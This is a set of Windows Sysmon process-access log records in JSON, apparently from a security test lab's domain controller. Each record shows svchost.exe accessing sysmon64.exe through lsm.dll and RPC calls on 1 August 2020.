{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6840,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6841,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6842,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6843,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6844,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
